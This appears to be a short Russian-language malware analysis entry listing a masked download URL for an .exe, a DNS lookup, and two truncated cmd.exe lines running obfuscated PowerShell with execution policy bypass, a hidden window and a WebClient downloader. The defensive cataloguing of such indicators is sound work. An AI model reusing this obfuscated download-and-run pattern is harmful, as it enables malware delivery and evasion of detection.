Техническая информация
- http://wh####ngssleu.at/3/zzf.exe
- DNS ASK wh####ngssleu.at
- '<SYSTEM32>\cmd.exe' /c FIlkyMzrjiVRSfo & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c FIlkyMzrjiVRSfo & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....